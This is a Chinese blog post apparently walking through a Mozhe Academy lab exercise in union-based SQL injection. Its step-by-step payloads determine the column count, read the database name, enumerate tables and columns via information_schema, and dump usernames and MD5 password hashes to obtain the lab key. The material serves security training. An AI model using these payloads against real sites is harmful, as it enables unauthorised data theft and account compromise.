当前位置:网站首页>墨者学院SQL注入解题
墨者学院SQL注入解题
2020-11-08 09:40:00 【osc_7bgz0no1】
一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4415254/blog/4707940
边栏推荐
- 个人短网址生成平台 自定义域名、开启防红、统计访问量
- IOS upload app store error: this action cannot be completed - 22421 solution
- 洞察——风格注意力网络(SANet)在任意风格迁移中的应用
- Basic concepts of computer network (5) basic principles of local area network
- 高并发,你真的理解透彻了吗?
- Architect (November 2020)
- 2020-11-05
- 麦格理银行借助DataStax Enterprise (DSE) 驱动数字化转型
- Windows subsystem Ubuntu installation
- The most detailed usage guide for perconaxtradbcluster8.0
猜你喜欢
Rust: command line parameter and environment variable operation
python 循环区分(while循环和for循环)
What is the difference between vivoy73s and vivoy70s
计算机网络基本概念(五)局域网基本原理
Search and replace of sed
Improvement of rate limit for laravel8 update
Deeplight Technology Bluetooth protocol SRRC certification services
ASP.NET A complete solution based on exception handling in MVC
Adobe Prelude /Pl 2020软件安装包(附安装教程)
NOIP 2012 提高组 复赛 第一天 第二题 国王游戏 game 数学推导 AC代码(高精度 低精度 乘 除 比较)+60代码(long long)+20分代码(全排列+深搜dfs)
随机推荐
November 07, 2020: given an array of positive integers, the sum of two numbers equals N and must exist. How to find the two numbers with the smallest multiplication?
Summary of knowledge points of Jingtao project
laravel8更新之速率限制改进
Recommend an economic science video, very valuable!
洞察——风格注意力网络(SANet)在任意风格迁移中的应用
What is the difference between vivoy73s and vivoy70s
vivoY73s和vivoY70s的区别 vivoY73s和vivoY70s哪个值得入手
双向LSTM在时间序列异常值检测的应用
More than 50 object detection datasets from different industries
PCR and PTS calculation and inverse operation in TS stream
IOS upload app store error: this action cannot be completed - 22421 solution
高并发,你真的理解透彻了吗?
FORTRAN77从文件中读入若干数据并用heron迭代公式开方
[original] about the abnormal situation of high version poi autosizecolumn method
QT hybrid Python development technology: Python introduction, hybrid process and demo
Julia 是如何风靡起来的?
ASP.NET A complete solution based on exception handling in MVC
What details does C + + improve on the basis of C
“智能5G”引领世界,数位智能网优+5G能带来什么?
print( 'Hello,NumPy!' )